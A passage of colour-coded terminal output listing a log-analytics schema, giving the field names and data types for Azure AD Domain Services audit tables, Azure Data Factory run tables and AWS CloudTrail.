\u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesDirectoryServiceAccess\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeLDAPDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeSyntaxOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AttributeValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectGUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldObjectDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpCorrelationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TreeDelete\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesLogonLogoff\"\u001b[39;49;00m: {\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ImpersonationLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPolicyChange\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessGranted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccessRemoved\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrashOnAuditFailValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DisabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EnabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EntryType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRoot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRootSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KerberosPolicyChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetbiosName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidFilteringEnabled\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoAttributes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoDirection\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TopLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPrivilegeUse\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewState\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceManager\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransactionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesSystemSecurity\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFActivityRun\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityIterationCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveIntegrationRuntime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Error\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Input\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Output\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFPipelineRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Predecessors\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFTriggerRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerFailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AWSCloudTrail\"\u001b[39;49;00m: {\n        \u001b[94m\"APIVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AWSRegion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalEventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementEvent\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReadOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"RecipientAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resources\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResponseElements\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceEventDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionCreationDate\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerPrincipalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionMfaAuthenticated\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SharedEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: 